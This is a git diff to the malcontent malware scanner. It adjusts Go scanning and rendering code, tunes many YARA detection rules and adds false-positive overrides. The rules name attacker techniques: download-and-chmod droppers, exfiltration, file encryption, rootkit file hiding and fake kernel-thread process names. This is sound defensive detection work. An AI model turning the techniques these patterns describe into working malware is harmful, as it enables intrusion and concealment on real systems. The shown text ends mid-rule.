diff --git a/Makefile b/Makefile index df6c33ad..bdd2c73a 100644 --- a/Makefile +++ b/Makefile @@ -48,7 +48,7 @@ fix: $(FIXERS) # END: lint-install ../malcontent SAMPLES_REPO ?= chainguard-dev/malcontent-samples -SAMPLES_COMMIT ?= 83f0693557b748ab4c395bdd749b85876fa53e92 +SAMPLES_COMMIT ?= 01cc2a1248c20c8a3d2b8b0acff0daf04196d487 OUT_DIR=out/samples-$(SAMPLES_COMMIT).tmp out/samples-$(SAMPLES_COMMIT): mkdir -p out diff --git a/pkg/action/scan.go b/pkg/action/scan.go index 741276d2..8a9e80d5 100644 --- a/pkg/action/scan.go +++ b/pkg/action/scan.go @@ -35,7 +35,7 @@ var ( ) // findFilesRecursively returns a list of files found recursively within a path. -func findFilesRecursively(_ context.Context, rootPath string) ([]string, error) { +func findFilesRecursively(ctx context.Context, rootPath string) ([]string, error) { var files []string // Follow symlink if provided at the root @@ -49,10 +49,13 @@ func findFilesRecursively(_ context.Context, rootPath string) ([]string, error) } } + logger := clog.FromContext(ctx) + err = filepath.WalkDir(root, func(path string, info os.DirEntry, err error) error { if err != nil { - return fmt.Errorf("walk: %w", err) + logger.Errorf("error: %s: %s", path, err) + return nil } if info.IsDir() || strings.Contains(path, "/.git/") { return nil diff --git a/pkg/render/terminal_brief.go b/pkg/render/terminal_brief.go index 78d662ea..1c5eceef 100644 --- a/pkg/render/terminal_brief.go +++ b/pkg/render/terminal_brief.go @@ -15,9 +15,9 @@ import ( "context" "fmt" "io" + "strings" "github.com/chainguard-dev/malcontent/pkg/malcontent" - "github.com/fatih/color" ) type TerminalBrief struct { @@ -37,10 +37,25 @@ func (r TerminalBrief) File(_ context.Context, fr *malcontent.FileReport) error return nil } - fmt.Fprintf(r.w, "├── 📄 %s %s%s%s\n", fr.Path, color.HiBlackString("["), riskInColor(fr.RiskLevel), color.HiBlackString("]")) + fmt.Fprintf(r.w, "├─ %s %s\n", riskEmoji(fr.RiskScore), fr.Path) for _, b := range fr.Behaviors { - fmt.Fprintf(r.w, "│ %s %s: %s\n", riskEmoji(fr.RiskScore), riskColor(fr.RiskLevel, b.ID), b.Description) + evidence := []string{} + for _, m := range b.MatchStrings { + if len(m) > 2 && !strings.Contains(b.Description, m) { + evidence = append(evidence, m) + } + } + + e := strings.Join(evidence, ", ") + if len(e) > 32 { + e = e[0:31] + "…" + } + if len(e) > 0 { + e = ": " + e + } + + fmt.Fprintf(r.w, "│ %s %s — %s%s\n", riskColor(fr.RiskLevel, "•"), riskColor(fr.RiskLevel, b.ID), b.Description, e) } return nil diff --git a/rules/builtin/kernel_module.yara b/rules/builtin/kernel_module.yara index cbc6e428..f711b6b7 100644 --- a/rules/builtin/kernel_module.yara +++ b/rules/builtin/kernel_module.yara @@ -1,10 +1,11 @@ - -rule kmod : high { +rule kmod : medium linux { meta: - description = "includes Linux kernel module source code" + description = "Linux kernel module source code" hash_2024_enumeration_deepce = "76b0bcdf0ea0b62cee1c42537ff00d2100c54e40223bbcb8a4135a71582dfa5d" + filetypes = "c,h" strings: $ref = "" + $not_define_linux = "#define _LINUX_MODULE_H" condition: - any of them + $ref and none of ($not*) } diff --git a/rules/combo/critical_paths.yara b/rules/combo/critical_paths.yara deleted file mode 100644 index d5fd1c6c..00000000 --- a/rules/combo/critical_paths.yara +++ /dev/null @@ -1,39 +0,0 @@ - -rule linux_critical_system_paths_medium : medium { - meta: - description = "accesses multiple critical Linux paths" - strings: - $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ - $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ - $p_usr_bin = /\/usr\/bin[\w\/\.\-]{0,32}/ - $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ - $p_proc = /\/proc\/[\w\/\.\-]{0,32}/ - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ - $p_sysctl = /sysctl[ -a-z]{0,32}/ - condition: - 5 of ($p*) -} - -rule linux_critical_system_paths_high : high { - meta: - description = "accesses multiple critical Linux paths" - strings: - $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ - $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ - $p_usr_bin = /\/usr\/bin[\w\/\.\-]{0,32}/ - $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ - $p_proc = /\/proc\/[\w\/\.\-]{0,32}/ - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ - $p_sysctl = /sysctl[ -a-z]{0,32}/ - $not_dirty = "/proc/sys/vm/dirty_bytes" - $not_swappy = "/proc/sys/vm/swappiness" - $not_somaxconn = "/prkyioc/sys/kernel/threads-max" - $not_mime = "/etc/apache/mime.types" - $not_clickhouse = "/tmp/jemalloc_clickhouse" - $not_falco = "/etc/falco/certs" - $not_pki = "/etc/pki/tls/cacert.pem" - $not_docker = "/var/run/docker" - $not_bpf = "/proc/sys/kernel/bpf_stats_enabled" - condition: - 6 of ($p*) and none of ($not*) -} diff --git a/rules/combo/degrader/linux_paths.yara b/rules/combo/degrader/linux_paths.yara new file mode 100644 index 00000000..2a15238e --- /dev/null +++ b/rules/combo/degrader/linux_paths.yara @@ -0,0 +1,52 @@ + +rule linux_critical_system_paths : medium { + meta: + description = "accesses multiple critical Linux paths" + strings: + $p_etc_crontab = "/etc/crontab" + $p_etc_sysctl_conf = "/etc/sysctl.conf" + $p_etc_init_d = /\/etc\/init.d[\w\/\.\-]{0,32}/ + $p_etc_cron_d = /\/etc\/cron.d[\w\/\.\-]{0,32}/ + $p_etc_selinux = /\/etc\/selinux[\w\/\.\-]{0,32}/ + $p_etc_systemd = /\/etc\/systemd[\w\/\.\-]{0,32}/ + $p_etc_preload = "/etc/ld.so.preload" + $p_ld_so_cache = "/etc/ld.so.cache" + $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ + $p_var_log = /\/var\/log[\w\/\.\-]{0,32}/ + $p_usr_libexec = /\/usr\/libexec[\w\/\.\-]{0,32}/ + $p_tmp = /\/tmp\/[\w\/\.\-]{0,32}/ + $p_sbin = /\/sbin\/[\w\/\.\-]{0,32}/ + $p_lib_systemd = /\/lib\/systemd[\w\/\.\-]{0,32}/ + $p_boot = /\/boot\/[\w\/\.\-]{0,32}/ + $proc_self_cmdline = "/proc/self/cmdline" + $proc_self_cgroup = "/proc/self/cgroup" + $p_lib = "/usr/lib/x86_64-linux-gnu/" + $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" + $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_sysctl = /sysctl[ -a-z]{0,32}/ + $p_dev_watchdog = "/dev/watchdog" + $p_ps = "/usr/bin/ps" + $p_ss = "/usr/bin/lsof" + $p_ssh = "/usr/bin/ssh" + $p_dev_shm = "/dev/shm" + condition: + filesize < 120MB and any of ($p_etc*) and 5 of ($p*) +} + +rule linux_critical_system_paths_small_elf : high { + meta: + description = "ELF accesses multiple critical Linux paths" + strings: + $not_vim = "VIMRUNTIME" fullword + condition: + filesize < 10MB and uint32(0) == 1179403647 and linux_critical_system_paths and none of ($not*) +} + +rule linux_critical_system_paths_small_shell : high { + meta: + description = "script accesses multiple critical Linux paths" + strings: + $hash_bang = "#!" + condition: + filesize < 64KB and $hash_bang in (0..2) and linux_critical_system_paths +} diff --git a/rules/combo/degrader/selinux_firewall.yara b/rules/combo/degrader/selinux_firewall.yara index 097f804b..d49c7032 100644 --- a/rules/combo/degrader/selinux_firewall.yara +++ b/rules/combo/degrader/selinux_firewall.yara @@ -1,9 +1,11 @@ -rule selinux_firewall : high { +rule selinux_firewall : high linux { meta: hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" + filetypes = "elf,so" + description = "references both SELinux and iptables/firewalld" strings: $selinux = /SELINUX[=\w]{0,32}/ fullword $f_iptables = /iptables[ -\w]{0,32}/ @@ -12,6 +14,8 @@ rule selinux_firewall : high { $not_iptables = "iptables-restore" $not_iptables_nft = "iptables-nft" $not_selinux_init = "SELINUX_INIT" + $not_define = "#define" fullword + $not_netlink = "NETLINK" fullword condition: - $selinux and any of ($f*) and none of ($not*) + filesize < 1MB and $selinux and any of ($f*) and none of ($not*) } diff --git a/rules/combo/dropper/binary.yara b/rules/combo/dropper/binary.yara index da52feef..c71793bb 100644 --- a/rules/combo/dropper/binary.yara +++ b/rules/combo/dropper/binary.yara @@ -7,8 +7,9 @@ rule chmod_executable_shell_binary : high { $chmod2 = /chmod [\-\w ]{0,4}\+[rw]{0,2}[75][ \$\@\w\/\.]{0,64}/ $http = "http:" $https = "https:" + $not_example = "try 'chmod +x'" condition: - filesize < 10MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($chmod*) and any of ($http*) + filesize < 10MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($chmod*) and any of ($http*) and none of ($not*) } rule download_and_execute : high { diff --git a/rules/combo/locker/readdir_rename_encrypt.yara b/rules/combo/locker/readdir_rename_encrypt.yara index 06f8c7a9..6e8ce1eb 100644 --- a/rules/combo/locker/readdir_rename_encrypt.yara +++ b/rules/combo/locker/readdir_rename_encrypt.yara @@ -1,10 +1,11 @@ -rule conti_alike : high { +rule conti_alike : high posix { meta: description = "Reads directories, renames files, encrypts files" hash_2023_Downloads_06ab = "06abc46d5dbd012b170c97d142c6b679183159197e9d3f6a76ba5e5abf999725" hash_2023_Downloads_8b57 = "8b57e96e90cd95fc2ba421204b482005fe41c28f506730b6148bcef8316a3201" hash_2023_Downloads_f864 = "f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5" + filetypes = "so,elf,macho" strings: $readdir = "readdir" fullword $rename = "rename" fullword @@ -13,6 +14,7 @@ rule conti_alike : high { $enc3 = "Encrypting file" $enc4 = "files_encrypted" $enc5 = "encrypts files" + $not_fscrypt_h = "#define _LINUX_FSCRYPT_H" condition: - filesize < 1MB and $readdir and $rename and any of ($enc*) + filesize < 1MB and $readdir and $rename and any of ($enc*) and none of ($not*) } diff --git a/rules/combo/recon/system_network.yara b/rules/combo/recon/system_network.yara index 09552f09..63c6b9d5 100644 --- a/rules/combo/recon/system_network.yara +++ b/rules/combo/recon/system_network.yara @@ -55,10 +55,11 @@ private rule exfil { filesize < 512KB and any of them } - rule sys_net_recon_exfil : high { - meta: - description = "may exfiltrate collected system and network information" - condition: - sys_net_recon and (obfuscate or exfil) -} \ No newline at end of file + meta: + description = "may exfiltrate collected system and network information" + strings: + $not_curl = "CURLAUTH_ONLY" + condition: + sys_net_recon and (obfuscate or exfil) and none of ($not*) +} diff --git a/rules/evasion/fake-process.yara b/rules/evasion/fake-process.yara index 0864655c..4f3e9d57 100644 --- a/rules/evasion/fake-process.yara +++ b/rules/evasion/fake-process.yara @@ -1,17 +1,24 @@ -rule fake_kworker_val : critical { +rule fake_kworker : critical linux { meta: description = "Pretends to be a kworker kernel thread" hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed" hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f" strings: - $kworker = /\[{0,1}kworker\/[\d:\]]{1,5}/ - $kworker2 = "kworker" fullword + $kworker = /\[{0,1}kworker\/[\w\%:\-\]]{1,16}/ $kworker3 = "[kworker" + condition: + filesize < 100MB and any of ($k*) +} +rule kworker : medium linux { + meta: + description = "Mentions kworker" + strings: + $kworker2 = "kworker" fullword $not_under_kworker = "_kworker" condition: - any of ($k*) and none of ($not*) + filesize < 1MB and any of ($k*) and none of ($not*) } rule fake_syslogd : critical { @@ -20,10 +27,10 @@ rule fake_syslogd : critical { strings: $ref = "[syslogd]" condition: - any of them + filesize < 1MB and any of them } -rule fake_bash_val : high { +rule fake_bash : high { meta: description = "Pretends to be a bash process" strings: @@ -32,18 +39,18 @@ rule fake_bash_val : high { filesize < 8KB and $bash } -rule fake_systemd : critical { +rule fake_systemd : critical linux { meta: description = "Pretends to be a systemd worker" strings: $ref = "systemd-worker" fullword condition: - filesize < 100MB and $ref + filesize < 10MB and $ref } -rule fake_process_names : high { +rule known_fake_process_names : high { meta: - description = "mentions known fake process names" + description = "mentions known fake process name" strings: $kdevchecker = "kdevchecker" fullword $kworkerr = "kworkerr" fullword @@ -54,3 +61,17 @@ rule fake_process_names : high { condition: filesize < 10MB and any of them } + +rule multiple_known_fake_process_names : critical { + meta: + description = "mentions multiple known fake process names" + strings: + $kdevchecker = "kdevchecker" fullword + $kworkerr = "kworkerr" fullword + $ksoftriqd = "ksoftriqd" fullword + $kdevtmpfsi = "kdevtmpfsi" fullword + $kthreaddk = "kthreaddk" fullword + $deamon = "deamon" fullword + condition: + filesize < 10MB and 2 of them +} diff --git a/rules/evasion/packer/upx.yara b/rules/evasion/packer/upx.yara index 19d175d7..9e3b8026 100644 --- a/rules/evasion/packer/upx.yara +++ b/rules/evasion/packer/upx.yara @@ -23,8 +23,9 @@ rule upx_elf : high { strings: $proc_self = "/proc/self/exe" $prot_exec = "PROT_EXEC|PROT_WRITE failed" + $not_upx_itself = "UPX comes with ABSOLUTELY NO WARRANTY" condition: - uint32(0) == 1179403647 and $prot_exec and $proc_self + uint32(0) == 1179403647 and $prot_exec and $proc_self and none of ($not*) } rule upx_elf_tampered : critical { diff --git a/rules/evasion/readdir-interceptor.yara b/rules/evasion/readdir-interceptor.yara index 0fae052a..52efb1f3 100644 --- a/rules/evasion/readdir-interceptor.yara +++ b/rules/evasion/readdir-interceptor.yara @@ -1,9 +1,10 @@ rule readdir_intercept : high { meta: - description = "userland rootkit designed to hide files" + description = "userland rootkit designed to hide files (readdir64)" hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116" hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71" hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586" + filetypes = "so,c" strings: $r_new65 = "readdir64" fullword $r_old64 = "_readdir64" @@ -19,6 +20,7 @@ rule readdir_tcp_wrapper_intercept : high { meta: description = "userland rootkit designed to hide files and bypass tcp-wrappers" ref = "https://github.com/ldpreload/Medusa" + filetypes = "so,c" strings: $r_new65 = "readdir64" fullword $r_old64 = "_readdir64" @@ -31,21 +33,25 @@ rule readdir_tcp_wrapper_intercept : high { rule readdir_intercept_source : high { meta: - description = "userland rootkit designed to hide files" + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" strings: $declare = "DECLARE_READDIR" $hide = "hide" condition: - all of them + filesize < 200KB and all of them } rule lkm_dirent : high { meta: - description = "kernel rootkit designed to hide files" + description = "kernel rootkit designed to hide files (linux_dirent)" hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "so" strings: - $dirent = "linux_dirent" - $Linux = "Linux" + $l_dirent = "linux_dirent" + $linux = "Linux" + $not_syscalls = "#define _LINUX_SYSCALLS_H" + $not_itimer = "__kernel_old_itimerval" condition: - all of them + filesize < 2MB and all of ($l*) and none of ($not*) } diff --git a/rules/false_positives/argo_workflows_ui.yara b/rules/false_positives/argo_workflows_ui.yara new file mode 100644 index 00000000..eda3986d --- /dev/null +++ b/rules/false_positives/argo_workflows_ui.yara @@ -0,0 +1,12 @@ +rule bash_js : override { + meta: + description = "bash.js; prism_bash.js" + infection_killer = "medium" + strings: + $bash = "BASH" + $prism = "(Prism)" + $js1 = "function" + $js2 = "var" + condition: + filesize < 32KB and $bash and $prism and all of ($js*) +} diff --git a/rules/false_positives/busybox.yara b/rules/false_positives/busybox.yara new file mode 100644 index 00000000..6c10ef05 --- /dev/null +++ b/rules/false_positives/busybox.yara @@ -0,0 +1,10 @@ +rule busybox : override { + meta: + description = "busybox" + infection_killer = "medium" + strings: + $description = /BusyBox is a multi-call binary that combines many common Unix\n\tutilities into a single executable./ + $license = "BusyBox is copyrighted by many authors between 1998-2015." + condition: + filesize < 1MB and all of them +} diff --git a/rules/false_positives/clamav.yara b/rules/false_positives/clamav.yara new file mode 100644 index 00000000..9230d5a1 --- /dev/null +++ b/rules/false_positives/clamav.yara @@ -0,0 +1,11 @@ +rule clamav_searchindex_json : override { + meta: + description = "searchindex.json" + linux_rootkit_terms = "medium" + strings: + $clamav = "clamav" + $description = "ClamAV is an open source (GPLv2) anti-virus toolkit, designed especially for e-mail scanning on mail gateways." + $tip = "Tip : ClamAV is not a traditional anti-virus or endpoint security suite." + condition: + filesize < 5MB and all of them +} diff --git a/rules/false_positives/druid.yara b/rules/false_positives/druid.yara new file mode 100644 index 00000000..d2067da1 --- /dev/null +++ b/rules/false_positives/druid.yara @@ -0,0 +1,11 @@ +rule wikiticker : override { + meta: + description = "wikiticker-2015-09-12-sampled.json" + crypto_stealer_names = "medium" + common_username_block_list = "medium" + strings: + $channel = /#.{2}.wikipedia/ + $wikipedia = /https:\/\/.{2}.wikipedia.org/ + condition: + filesize < 20MB and all of them +} diff --git a/rules/false_positives/filebeat.yara b/rules/false_positives/filebeat.yara new file mode 100644 index 00000000..93439d31 --- /dev/null +++ b/rules/false_positives/filebeat.yara @@ -0,0 +1,12 @@ +rule misp_mdjson : override { + meta: + description = "misp_sample.mdjson.log" + lvt = "medium" + strings: + $attribute = "Attribute" + $event = "Event" + $galaxy = "Galaxy" + $shadow = "ShadowAttribute" + condition: + filesize < 128KB and all of them +} diff --git a/rules/false_positives/google_cloud_sdk.yara b/rules/false_positives/google_cloud_sdk.yara new file mode 100644 index 00000000..bd0f1e28 --- /dev/null +++ b/rules/false_positives/google_cloud_sdk.yara @@ -0,0 +1,11 @@ +rule gcloud_mysql_py : override { + meta: + description = "mysql.py" + infection_killer = "medium" + strings: + $description = "This installer will install mysql-server on an Ubuntu machine." + $install = "apt-get -y install mysql-server" + $license = "# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/" + condition: + filesize < 10KB and all of them +} diff --git a/rules/false_positives/jellyfin.yara b/rules/false_positives/jellyfin.yara new file mode 100644 index 00000000..14444b84 --- /dev/null +++ b/rules/false_positives/jellyfin.yara @@ -0,0 +1,11 @@ +rule swashbuckle_dll : override { + meta: + description = "Swashbuckle.AspNetCore.ReDoc.dll" + infection_killer = "medium" + strings: + $description = "Middleware to expose an embedded version of Redoc from an ASP.NET Core application" + $license = "&Copyright (c) 2016-2024 Richard Morris" + $repository = "https://github.com/domaindrivendev/Swashbuckle.AspNetCore" + condition: + filesize < 1MB and all of them +} diff --git a/rules/false_positives/kubeflow_centraldashboard.yara b/rules/false_positives/kubeflow_centraldashboard.yara new file mode 100644 index 00000000..69854f31 --- /dev/null +++ b/rules/false_positives/kubeflow_centraldashboard.yara @@ -0,0 +1,12 @@ +rule make_win_ps1 : override { + meta: + description = "make-win.ps1" + SECUINFRA_SUSP_Powershell_Base64_Decode = "medium" + strings: + $end = "END=OF=COMPILER" + $registry = "gcr.io/kubeflow-images-public/centraldashboard" + $repository = "https://github.com/avdaredevil/AP-Compiler" + $start = "START=OF=COMPILER" + condition: + filesize < 10KB and all of them +} diff --git a/rules/false_positives/linux_src.yara b/rules/false_positives/linux_src.yara new file mode 100644 index 00000000..81a1d02d --- /dev/null +++ b/rules/false_positives/linux_src.yara @@ -0,0 +1,17 @@ +rule linux_test_script : override linux { + meta: + semicolon_short_tmp = "medium" + bash_dev_tcp = "medium" + relative_background_launcher = "medium" + chattr_immutable_caller_high = "medium" + hidden_short_path = "medium" + kernel_module_loader = "medium" + cd_root = "medium" + description = "Linux test script" + strings: + $gpl = "# SPDX-License-Identifier: GPL-2.0" + $bash = "#!/bin/bash" + $sh = "#!/bin/sh" + condition: + filesize < 32KB and $gpl in (1..256) and ($bash in (0..8) or $sh in (0..8)) +} diff --git a/rules/false_positives/mattermost.yara b/rules/false_positives/mattermost.yara new file mode 100644 index 00000000..1477d155 --- /dev/null +++ b/rules/false_positives/mattermost.yara @@ -0,0 +1,10 @@ +rule mm_client_js_map : override { + meta: + description = "3937.844b09f50594ca2613b4.js" + casing_obfuscation = "medium" + strings: + $mattermost = "mattermost" + $powershell = "PowerShell" + condition: + filesize < 20KB and all of them +} diff --git a/rules/false_positives/mlflow.yara b/rules/false_positives/mlflow.yara index ab7e3e57..46d18fef 100644 --- a/rules/false_positives/mlflow.yara +++ b/rules/false_positives/mlflow.yara @@ -1,4 +1,4 @@ -rule pypi_packages : override { +rule mlflow_pypi_packages : override { meta: description = "pypi_package_index.json" killer_miner_panchansminingisland = "low" @@ -17,3 +17,14 @@ rule pypi_packages : override { condition: $index_date and $package_names and 5 of ($s*) } + +rule mlflow_webpack : override { + meta: + description = "203.b7219352.chunk.js" + infection_killer = "medium" + strings: + $mlflow = "mlflow" + $webpack = "webpack" + condition: + filesize < 1MB and $webpack and #mlflow > 0 +} diff --git a/rules/false_positives/nmap.yara b/rules/false_positives/nmap.yara new file mode 100644 index 00000000..345a6947 --- /dev/null +++ b/rules/false_positives/nmap.yara @@ -0,0 +1,11 @@ +rule nmap_fingerprints : override { + meta: + description = "http-fingerprints.lua" + SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell = "medium" + strings: + $description = "---HTTP Fingerprint files" + $license = "This file is released under the Nmap license" + $fingerprint = /fingerprint.{0,32}/ + condition: + filesize < 512KB and $description and $license and #fingerprint > 0 +} diff --git a/rules/false_positives/py_versioneer.yara b/rules/false_positives/py_versioneer.yara new file mode 100644 index 00000000..f31ebe2e --- /dev/null +++ b/rules/false_positives/py_versioneer.yara @@ -0,0 +1,10 @@ +rule versioneer_py : override { + meta: + description = "versioneer.py" + python_exec_near_enough = "medium" + strings: + $script = "versioneer.py" + $versioneer = "VERSIONEER" + condition: + filesize < 200KB and all of them +} diff --git a/rules/false_positives/rust.yara b/rules/false_positives/rust.yara new file mode 100644 index 00000000..ace0f9fe --- /dev/null +++ b/rules/false_positives/rust.yara @@ -0,0 +1,35 @@ +rule emscripten : override { + meta: + description = "emscripten.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $license = "Copyright 2017 The Rust Project Developers." + $script = "emscripten" + $sdk = "emsdk" + condition: + filesize < 2KB and all of them +} + +rule linux_s390x : override { + meta: + description = "linux-s390x.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $img = "https://github.com/qemu/qemu/raw/master/pc-bios/s390-ccw.img" + $initrd = "http://ftp.debian.org/debian/dists/testing/main/installer-s390x/20170828/images/generic/initrd.debian" + $kernel = "http://ftp.debian.org/debian/dists/testing/main/installer-s390x/20170828/images/generic/kernel.debian" + condition: + filesize < 1024 and all of them +} + +rule linux_sparc64 : override { + meta: + description = "linux-sparc64.sh" + curl_chmod_relative_run_tiny = "medium" + strings: + $iso = "https://cdimage.debian.org/cdimage/ports/9.0/sparc64/iso-cd/debian-9.0-sparc64-NETINST-1.iso" + $initrd = "debian-9.0-sparc64-NETINST-1.iso boot/initrd.gz" + $kernel = "debian-9.0-sparc64-NETINST-1.iso boot/sparc64" + condition: + filesize < 1024 and all of them +} diff --git a/rules/false_positives/sqlpad.yara b/rules/false_positives/sqlpad.yara new file mode 100644 index 00000000..327ae9ef --- /dev/null +++ b/rules/false_positives/sqlpad.yara @@ -0,0 +1,11 @@ +rule azure_kvkeys_index_js : override { + meta: + description = "index.js.map" + lvt = "medium" + strings: + $azure = "Azure Key Vault" + $license1 = "Copyright (c) Microsoft Corporation" + $license2 = "Licensed under the MIT license" + condition: + filesize < 512KB and all of them +} diff --git a/rules/false_positives/thingsboard.yara b/rules/false_positives/thingsboard.yara new file mode 100644 index 00000000..79d46f7e --- /dev/null +++ b/rules/false_positives/thingsboard.yara @@ -0,0 +1,13 @@ +rule thingsboard_scripts_js : override { + meta: + description = "scripts.c88fecd373e21509.js" + infection_killer = "medium" + strings: + $delimited1 = "|kill|killall|" + $delimited2 = "|pkill|" + $minified_js1 = "!function(A,N)" + $minified_js2 = "throw new Error(\"Argument to polyad must be a positive number\");" + $minified_js3 = "throw new Error(\"Selector \"+G+\" did not match a DOM element\");" + condition: + filesize < 256KB and all of them +} diff --git a/rules/fs/file-make_executable.yara b/rules/fs/file-make_executable.yara index fb5189e8..0cf3dd65 100644 --- a/rules/fs/file-make_executable.yara +++ b/rules/fs/file-make_executable.yara @@ -19,8 +19,9 @@ rule chmod_executable_shell_binary : high { strings: $val = /chmod [\-\w ]{0,4}\+[rw]{0,2}x[ \$\@\w\/\.]{0,64}/ $val2 = /chmod [\-\w ]{0,4}\+[rw]{0,2}[75][ \$\@\w\/\.]{0,64}/ + $not_example = "try 'chmod +x'" condition: - filesize < 20MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of them + filesize < 20MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) and any of ($val*) and none of ($not*) } rule chmod_executable_ruby : high { diff --git a/rules/fs/permission-modify-dangerous.yara b/rules/fs/permission-modify-dangerous.yara index 7ae0cbc5..1c4543ad 100644 --- a/rules/fs/permission-modify-dangerous.yara +++ b/rules/fs/permission-modify-dangerous.yara @@ -5,19 +5,20 @@ rule chmod_word_writeable : medium { strings: $ref = /chmod [\-\w ]{0,4}666[ \$\w\/\.]{0,32}/ condition: - $ref + filesize < 50MB and $ref } rule chmod_dangerous_exec : high exfil { meta: - description = "Makes a world writeable executable" + description = "Makes path world writeable and executable" hash_2023_APT31_1d60 = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2" hash_2023_Merlin_48a7 = "48a70bd18a23fce3208195f4ad2e92fce78d37eeaa672f83af782656a4b2d07f" hash_2023_Py_Trojan_NecroBot_0e60 = "0e600095a3c955310d27c08f98a012720caff698fe24303d7e0dcb4c5e766322" strings: $ref = /chmod [\-\w ]{0,4}777[ \$\w\/\.]{0,32}/ - $not_dev_shm = "chmod 1777 /dev/shm" + $not_chmod_1777 = "chmod 1777" + $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" condition: - $ref and not ($not_dev_shm and $not_chromium) + filesize < 50MB and $ref and none of ($not*) } diff --git a/rules/kernel/module-load.yara b/rules/kernel/module-load.yara index c695e0e6..6c4b04a1 100644 --- a/rules/kernel/module-load.yara +++ b/rules/kernel/module-load.yara @@ -1,25 +1,38 @@ -rule init_module : medium { +rule init_module : medium linux { meta: - description = "Load Linux kernel module" + description = "Linux kernel module" syscall = "init_module" capability = "CAP_SYS_MODULE" hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf" hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410" hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d" + filetypes = "ko,elf,so" strings: $ref = "init_module" fullword condition: - all of them + filesize < 1MB and all of them } -rule kernel_module_loader : high { +rule kernel_module_loader : high linux { meta: + description = "loads Linux kernel module via insload" hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d" strings: $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/ condition: - all of them + filesize < 10MB and all of them } + +rule cha_cha_tests : override linux { + meta: + description = "test_cipher.ko" + filetypes = "sh" + kernel_module_loader = "medium" + strings: + $test = "insmod test_cipher.ko size" + condition: + filesize < 2KB and any of them +} \ No newline at end of file diff --git a/rules/kernel/symbol-lookup.yara b/rules/kernel/symbol-lookup.yara index 7e540f5c..8774cc54 100644 --- a/rules/kernel/symbol-lookup.yara +++ b/rules/kernel/symbol-lookup.yara @@ -1,14 +1,17 @@ -rule kallsyms : high { +rule kallsyms : high linux { meta: description = "access unexported kernel symbols" ref = "https://lwn.net/Articles/813350/" hash_2023_FontOnLake_1F52DB8E3FC3040C017928F5FFD99D9FA4757BF8_elf = "efbd281cebd62c70e6f5f1910051584da244e56e2a3228673e216f83bdddf0aa" hash_2023_FontOnLake_27E868C0505144F0708170DF701D7C1AE8E1FAEA_elf = "d7ad1bff4c0e6d094af27b4d892b3398b48eab96b64a8f8a2392e26658c63f30" hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" + filetypes = "so,elf" strings: $ref = 